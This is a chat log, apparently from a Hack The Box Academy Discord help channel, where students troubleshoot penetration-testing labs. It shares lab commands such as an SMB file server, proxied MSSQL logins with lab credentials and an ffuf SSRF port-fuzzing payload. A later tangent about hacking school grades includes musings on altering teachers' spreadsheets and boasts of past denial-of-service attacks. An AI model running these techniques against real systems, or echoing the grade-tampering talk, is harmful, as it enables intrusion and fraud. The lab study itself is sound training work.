Hey @mortal basin, could I possibly DM you regarding Secure Coding 101 module? I've got a question regarding the Encrypted Array chapter, as well as the 4th question in the Skill Assessment.

fiery trench
#

Anybody can provide me a hint for Introduction To Nosql Injection Skills Assessment II? Been stuck on this for a while, and can’t find any difference in the case if this was a blind injection. The server seems to search for the parameter name and complains if it’s missing. I was able to guess the user but for the other functions forget and token I’m still hitting a brick wall.

analog dock
#

Hello, any help for question 4 of ad skills assessment part 1? “Submit the contents of the flag.txt file on the administrator desktop on ms01”

I got the sql acc creds, but I feel like I can’t use them anywhere

fiery trench
analog dock
#

Is it possible to do a ps invoke-webrequest to download all of a folder?

#

Im trying to download chisel on it from my attack host

zinc marsh
#

I use this tool anyways

low vine
#

CPTS:File Transfer - I'm trying to understand how file transfers work from downloading file in windows off of Linux.

  1. sudo impacket-smbserer share -smb2support /tmp/smbshare Can I get some clarification on this? is the /tmp/smbshare something I'm making up as the directory for the file I'm hosting?
#

Having some clarification problem and would just like a better explanation on what is ment

zinc marsh
#

and u move the files to the smb server

iron plaza
zinc marsh
#

/tmp is temporal when u reset the vm they dissapear

valid cipher
#

Show all lines that do not contain the # character.

#

I'm in the regex section of linux intro

#

how 2 do it

#

ok

forest zenith
#

I currently have the student subscription to academy, can I upgrade one month to Platinum and then downgrade the month after to student?

acoustic owl
zinc marsh
low vine
#

i reset everything and it worked fine

#

couldnt tell you what it was but was driving me crazy

umbral wigeon
#

Currently facing troubles with Broken Authentication - Skills Assessment https://academy.hackthebox.com/module/80/section/848

I have got to the point where
||- I have the login credentials of support.uk

  • I enumerated other users using the message platform (guest, support, support.it)
  • I am able to manipulate cookies, and tried roles for support.uk such as (root, super, admin)||

However, I am still unable to get the escalated privileges. Do i need to enumerate and login as other users or do i need to enumerate the roles for the user support.uk?

hasty solar
#

can I dm anyone on Thick Client Applications sections from Attacking Common apps?

rustic sage
#

Definitely agreed. Get-DomainObjectACL -ResolveGUIDs -Identity "GPO Management" | ? {$_.SecurityIdentifier -eq $sid} is a lot faster and will get you the answer immediately.

forest zenith
wild dragon
torn blade
#

just making sure im not an idiot. If it says you need ot add the vhost "minilab.htb.net" all you ahve to do is add taht in the etc/host file right

iron plaza
torn blade
#

so like this

#

bruhhhhhhh it just takes me to the nginx page ahhhhhhhh

iron plaza
#

is your vpn on?

torn blade
#

naw

#

i just use the HTB VM in the browser

iron plaza
#

something is wrong with the pwnbox then ... try resetting it

fresh compass
#

Hi, in the Footprinting module, DNS section, I cannot solve the last exercise and I have been trying everything

#

Somebody could help? thanks

trail leaf
#

Currently doing the Privileged Access - SQL Admin exercise in the Active Directory Enumeration and Attacks Module, and getting an error that I'm struggling to troubleshoot. Connecting to MSSQL from the Windows machine wasn't working for some reason, so I set up proxychains and attempted to use mssqlclient.py from my own machine.

kali@transistor:~/Documents/htb-academy/CPTS/ad-enumatk$ proxychains mssqlclient.py INLANEFREIGHT.LOCAL/DAMUNDSEN:'SQL1234!'@172.16.5.150 -windows-auth
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.5.150:1433  ...  OK
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
#

Maybe I'm not googling hard enough, but I'm just stumped trying to troubleshoot this right now

hidden shell
iron plaza
trail leaf
rough comet
#

can someone please clarify to me, differences between DNS zone transfer vs brute force?

#

I mean, the axfr is pretty obvious

#

but why I can get a record via brute force and not via zone transfer? basically because that zone does not allow zone transfer but quierying the records individually, may respond?

#

I just finished the Foot Printing / DNS section and I wanted to fully understand that concept before I move on

thorn urchin
#

a zone transfer is actually a misconfiguration and is a security finding

rough comet
#

got it

thorn urchin
#

you SHOULDN'T be allowed to axfr a zone 99% of the time.

#

so when you can, its report time

rough comet
#

so... as a take away lesson, it is correct to say: try to see if zone transfer works, then brute force? just in case?

thorn urchin
#

basically yes

rough comet
#

Thank you!

thorn urchin
#

its worth trying because its a vuln and also gives you a ton of information if it works

rough comet
#

got it

thorn urchin
#

also remember bruteforce isnt the only method to collect sub domains

rough comet
#

got it

#

what would be another viable alternative then?

#

via dig?

thorn urchin
#

thats kinda in the same realm

#

and its not about alternative, its other methods to be used in conjunction. Things like scraping sites from the domain, google dorking, looking at ssl certificates

valid cipher
#

why cant i open any of the links in the sources.list file

thorn urchin
#

which module and section

valid cipher
#

Linux fundamentals

thorn urchin
#

ah havnt done that one

valid cipher
thorn urchin
#

Im not on any atm, im doing the CPTS exam

supple patio
thorn urchin
#

thats what Im working on

#

well, at work work now, but Ive got all week to finish out the report

valid cipher
thorn urchin
#

about 7ish months for me personally

#

each persons time is going to significantly vary though

supple patio
valid cipher
#

can u hack people now ?

supple patio
thorn urchin
#

Thats a very poor question to ask

supple patio
thorn urchin
#

Nothing, I started the exam the following weekend

supple patio
thorn urchin
#

yeah

#

I had planned for more prep though, but I was running behind my personal schedule so I opted to hop right in instead of waiting

supple patio
#

what would you recommend to do for individuals who doesn't have background experience just completed the path?

thorn urchin
#

ive heard the prolabs dante and zephyr are good practice. and just generally reviewing the modules

#

everything you need to solve the exam is with a combination of the module content and having an innate sense of curiosity

#

when youre doing module labs deviate, experiment with trying different things. Deliberately figure out why something wont work

#

if youre just going through all the modules and only copy pasting solutions youre going to have a very rude awakening

supple patio
#

had something like copy pasting before the file transfers

#

then tried to understand

#

what's happening

thorn urchin
#

you need to be comfortable facing a totally new web application and looking up documentation to figure out how its native functionality can be abused to gain code execution/creds/secrets

#

the course isnt going to directly teach you that, but it will give you the clues and practice to develop the awareness to do so

#

and that's just one kind of example of what I mean when I say you need that spark of creativity

#

which is my favorite thing about the exam. The whole course tells you its methodology focused, and the exam cements it. Uncurious people wont pass.

#

thats enough rambling from me though. I can write entire manifestos about proper hacking mindsets

thorn urchin
supple patio
#

i was wondering about doing boxes for each module after completing the path

thorn urchin
#

doing boxes never hurts

valid cipher
valid cipher
#

why

thorn urchin
#

thats like asking, "How long did it take learning MMA before you got good enough to mug people on the streets"

supple patio
thorn urchin
#

Ive done the teenager blackhat thing 10-15ish years ago. I dont recommend it anymore, the industry has grown and changed

thorn urchin
#

and going after individuals involves different sub-skillsets then going after companies

#

No, being a blackhat is dumb these days

#

it USED to be the only way to learn. so everyone did. but nowadays youve got tons of courses, doing it to learn isnt a valid excuse anymore

#

this server is also not blackhat friendly

valid cipher
#

im not blackhat

thorn urchin
#

if thats your goal dont be surprised when you get the boot sooner or later

supple patio
#

just destroyed his own life

valid cipher
#

who is he

supple patio
valid cipher
#

i only use hackforums

autumn pilot
#

keep the channel on topic please

supple patio
quasi wave
#

hi I need a hint on Nibbles - Initial Foothold section of getting started module

#

actually can someone help me get through this one?

#

don't give me the answer but if someone could coach me through to solving it that would be great

fathom pendant
#

Doesn't that section walk you through it?

quasi wave
#

it does ok

#

maybe I need to reread it

#

thank you

#

I did earlier two sections a few days ago

#

and forgot about them

#

lmao should I just start over?

#

I feel like I wouldn't learn just starting over and doing some sections again

#

hold on wait

thorn urchin
#

thats what notes are for

#

my notes from beginning of the course to end of course are dramatically different in quality lul

#

I should probably go back and rewrite some

quasi wave
#

ok I will go back and do section again

#

thank you

#

I got to the part where I am viewing my image but the image I uploaded via php didn't show up

#

can someone help me with this?

fathom pendant
thorn urchin
#

yeah even if it fails, try different methods. try different tools, tweak things to understand why the solution works and why other methods dont. Write down when you do find other methods.

if you know in your heart that something you know how to do would work better do it.

quasi wave
#

problem solved thank you

thorn urchin
#

the modules even subtly encourage it. There are sections and assessments that are easier to complete if you deviate from the literal instructions and utilize lessons from the earlier modules synergeticly

quasi wave
#

I tried to download the file to target using wget and its giving me a 404 Not Found error

zinc marsh
#

I had completed this section before not sure if I am bugged now, I am trying to read /var/log now but it says permission denied.

thorn urchin
quasi wave
#

hi has anyone here completed the module and if so can you help me out with this?

#

I would be psyched

zinc marsh
fathom pendant
rare topaz
rare topaz
quasi wave
#

I just closed machine gonna take a break for a few hours

rare topaz
#

aight ig?

quasi wave
#

I think if I do it again later I will catch mistake

#

gotta make it sink in

#

rather than get answer quickly

golden vortex
#

i saw that @quasi wave

lyric bolt
#

I am once again asking for your help oh wise members of this forum

#

Im stuck on the Attacking Common services hard module

#

I was able to get the smb share, I found the 3 user folders in there, got the RDP creds, but have yet to find creds to use against the mssql application

ashen umbra
#

I am in information gathering web skills assessment. I need to get the subdomain from githubapp.com that contains 'triage'. I have tried sublist3r with no results, my syntax is correct. Either virustotal blocking request or only 6 subdomains show. I have tried google dorking site: githubapp.com. I have tried using crt.sh with only errors. I tried DNS dumpster. I have yet to find anything that says triage. Anyone else encounter this error or have a hint for me?

supple patio
#

you may DM if you want

lyric bolt
#

was trying with all possible password and user combos here is an example with a password left out so as not to spoil for others
sqsh -S 10.129.203.10 -U Fiona -P 'password' -h

supple patio
#

try to watch out again the stuff "how to connect"

lyric bolt
#

L

#

O

#

L

#

i feel dumb

#

thank you

#

i connected

supple patio
#

🙂

lyric bolt
#

🙂

supple patio
lyric bolt
#

will do

#

thank you

soft dagger
#

Hello

#

Anyone can tell us how to solve the nmap medieum lab

#

i tried a lot of commands but no result, i get open port but when i try to do --script dns-nsid,i get no result

acoustic owl
soft dagger
#

could you explain more

#

beacuse this is a module and you must pass it to get the cube

acoustic owl
soft dagger
#

i tried but i get no answer, could you tell me the right command if you know it

acoustic owl
soft dagger
#

in PwnBox

#

i will try tomorrow, beacuse i only have 1 spawn/day

#

Also, i need to know what is the difference between Vm and PwnBox, because i see there is no difference.

#

are you still there?

acoustic owl
#

PwnBox runs on the server of HTB.
A VM is running on your PC

thorn urchin
#

PwnBox is online VM provided by htb, VM is local vm connected via the vpn

soft dagger
#

Yes, i know this point, but i ask about why the results appear in one than other, although HTB provide both TCP and UPD, anyway no prblem

#

do you know the command in Pwn Box for nmap mediem lab ???

ashen umbra
#

Reposting this

I am in information gathering web skills assessment. I need to get the subdomain from githubapp.com that contains 'triage'. I have tried sublist3r with no results, my syntax is correct. Either virustotal blocking request or only 6 subdomains show. I have tried google dorking site: githubapp.com. I have tried using crt.sh with only errors. I tried DNS dumpster. I have yet to find anything that says triage. Anyone else encounter this error or have a hint for me?

#

using amass currently and it is taking forever

ashen umbra
#

i figured as much

thorn urchin
#

only way to find it now is to use a tool that has historical checks. idr which one I used off the top of my head

ashen umbra
#

wayback machine?

thorn urchin
#

if you search the discord about the question youll find someone mentioning

thorn urchin
thorn urchin
#

as for command, its an assessment lab your job to figure it out

soft dagger
#

okay, i will try

#

any way thank you

thorn urchin
#

good luck 👍

soft dagger
#

thanks

ashen umbra
worn bronze
#

Does anybody know if the notes Im taking from modules can be shared on github for example? Maybe it has some copyright or protection by Htb. Thanks

compact apex
#

Hey I am doing the server side attack modules and I am at section SSRF I try to do the exercice but I am not able to perform a nice filter for my ffuf command. Can someone explain me please ?
||```shell
ffuf -w ./ports.txt:PORT -u "http://10.129.114.131/load?q=http://internal.app.local/load?q=http::////127.0.0.1:PORT" -fr 'unknown[[:blank:]]url[[:blank:]]type'



EDIT: Resolved I am stupid I forgot to add a double : in my curl request
thorn urchin
worn bronze
#

I rewrote to my native language the parts of the modules i find more interesting and useful. Its also true that sometimes I copy paste some of the charts, translated aswell but its almost they same

#

So i think I wont, because HTB is charging for it and it would be such a bad practice to share it for free

#

Thank you

analog dock
#

Happy that I’ve completed this one

pine dagger
analog dock
rough comet
#

AD is fun though... but being working with it (as sysadmin though) since 2003

zinc marsh
valid cipher
analog dock
rustic sage
#

guys i am basically desperate anyone willing to help me

#

if yes can i go into dm's

rough comet
#

what issue do you have? which module?

thorn urchin
#

this is literally a crime

#

fuck off

valid cipher
rustic sage
#

PLS

thorn urchin
#

<@&861185840277487616>

valid cipher
#

i got banned for 2 weeks for asking this question

#

dont do it

rustic sage
#

fuck man

valid cipher
#

delete msg

thorn urchin
#

Not the server for this

rustic sage
thorn urchin
#

then leave the server

rustic sage
#

i just am gonna cry in a corner

thorn urchin
#

youre not welcomed here

valid cipher
rough comet
#

someone call a mod?

thorn urchin
#

already did

rough comet
#

to ban the troll

rough comet
thorn urchin
#

just gotta wait for one of em to see the ping and take care of it

#

and youre a little wannabe scumbag

#

go get arrested shithead

proud pine
#

I always report them to discord, as well.

rustic sage
thorn urchin
#

oh good point forgot to do that too

#

lmao

valid cipher
#

whats hydra

thorn urchin
#

'ims just use hydra' ahahaha

rustic sage
thorn urchin
fathom pendant
#

You see he tried

rustic sage
#

whats nexst calling anti terrorist units

thorn urchin
#

I might

#

want me to?

fathom pendant
#

And you wanted to be a brat about it

rough comet
#

guys, do not feed the troll

rustic sage
#

nothing nice about that

thorn urchin
#

cause youre too dumb to read the rules and also so dumb you asked about breaking the law on a public discord

rustic sage
#

yeah bro

thorn urchin
#

no survival instinct

#

you go to jail

#

good, now as you said thats the only reason you came here

#

so leave

#

go try some skid discord and get scammed and doxxed instead

#

no discord hiccupping

proud pine
#

Just this server, it seems. Probably from people reporting him.

rustic sage
#

lol

#

yall htb noobs are wild

#

general nonsense seeping into a learning channel...

thorn urchin
#

whitechatte gets wild sometimes

#

consequences of no verification

rustic sage
#

or basic google search assessment wall

thorn urchin
#

dude literally came here just to ask someone to hack his school grades for him

valid cipher
supple patio
thorn urchin
#

its easy to do for most schools but so obvious getting away with it is nearly impossible

#

Id distance yourself from said friend before he is escorted out of class one day

valid cipher
#

you cant get arrested when your my age i dont think

thorn urchin
#

anyways, anyone actually have an on topic question

thorn urchin
proud pine
valid cipher
#

shit

thorn urchin
#

even when I was doing blackhat stuff my school was off limits for a reason

iron plaza
#

someone should have said ok to that dudes request to change grades ... call the school principle and ask for permission to hack and change his [insert name] grades as per his request. wonder how that would go with him

rustic sage
#

when you realize teachers record their scoring in a spreadsheet, often one hosted in Office365... its not hard to imagine how to modify scores..

thorn urchin
#

yeah but I gurantee you Miss Sanchez when report card time comes knows that Fred the Failure shouldnt have an A+ and alarms will get raised.

thorn urchin
#

and if you were smart enough to tweak things subtly enough to be meaningful and not get caught you were smart enough to just have passing grades anyways

valid cipher
#

100 in most exams

#

but 99 in a few

thorn urchin
#

nah thats not subtle

#

your friend is fucked

rustic sage
#

You see boys, its simple, I just dropped out

#

You should too

zinc marsh
#

is not easier just pass the exams

thorn urchin
#

his best hope is to change things back and hope no one noticed

zinc marsh
#

than learn hacking ur marks in the school?

rustic sage
#

your friends best option is to just delete the grade spreadsheet entirely.

thorn urchin
#

at this point? yeah maybe lol

#

assuming they arent already building the case

rustic sage
#

if they hire a good dfir practitioner, it will be obvious

proud pine
#

I'm not sure why anyone is even humoring the idea that he actually did it, and didn't lie about it to seem cool to his friends.

valid cipher
rustic sage
#

because lying on the internet makes for interesting conversation

valid cipher
#

can u do simutaneous eqations

thorn urchin
zinc marsh
rustic sage
#

fbi wont give a shit

thorn urchin
#

eh depends

zinc marsh
rustic sage
#

the process is usually delegated to a school board and that school board has investigators on retainer

valid cipher
#

only hacking can achieve this

thorn urchin
#

lol

zinc marsh
rustic sage
#

drop out, its the best option

#

school is a waste of time

proud pine
#

imagine thinking this, for real

zinc marsh
rustic sage
#

right, to waste your time

#

lol

zinc marsh
rustic sage
#

im not going to say its the best advice, but its what i did, and its paid off in dividends

valid cipher
#

fuck studying man

zinc marsh
#

imagine hacking all the accounts of ur teachers to change ur mark

rustic sage
#

yeah sounds fun personally

#

but legally, dont do that

fathom pendant
#

More effort than studying

zinc marsh
rustic sage
#

SAT scores > grades

zinc marsh
#

that is what i mean

valid cipher
zinc marsh
#

and wasting ur time hacking ur teacher accounts

rustic sage
#

if you are a hot girl, you can quid pro quo your way through life

#

always the option

rustic sage
#

its a different form of hacking

thorn urchin
#

social engineering

valid cipher
rustic sage
#

thats how you are supposed to do it

valid cipher
zinc marsh
rustic sage
#

i also viewed high school through the lens of how to get away with it

zinc marsh
#

and in every work

rustic sage
#

well, no

#

because i eventually got caught

valid cipher
rustic sage
#

and now im on the straight and narrow

rustic sage
valid cipher
rustic sage
#

I partook in the 4chan egypt hacking

valid cipher
#

wat

zinc marsh
rustic sage
#

LOIC, etc

zinc marsh
rustic sage
#

you are likely too young to remember this

valid cipher
rustic sage
#

why..

#

would you turn that on

#

in 2023...

valid cipher
#

idk read some websites apparently it works

#

but it doesnt

rustic sage
#

lmfao bro

proud pine
#

imagine using LOIC outside of the 1990's